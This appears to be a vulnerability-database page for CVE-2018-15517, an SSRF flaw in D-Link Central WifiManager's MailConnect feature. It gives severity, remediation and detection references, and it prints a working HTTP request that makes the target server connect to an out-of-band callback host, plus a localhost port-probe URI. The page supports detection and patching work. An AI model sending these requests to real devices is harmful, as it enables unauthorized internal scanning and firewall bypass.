🔙 목록으로 돌아가기

CVE-2018-15517: D-Link Central WifiManager - Server-Side Request Forgery

TitleD-Link Central WifiManager - Server-Side Request Forgery
Authorgy741
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network.
RemediationApply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager.
CVSS Score8.6
EPSS Score0.76866
CVE IDCVE-2018-15517
CWE IDCWE-918
Tags cve cve2018 seclists packetstorm dlink ssrf oast vkev vuln

🔍 Vulnerability Description

D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.

🌐 HTTP Request

GET /index.php/System/MailConnect/host/d5jprv1le0o2cf0r82t09dddje8wnon3b.oast.online/port/80/secure/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-15517.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-15517.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A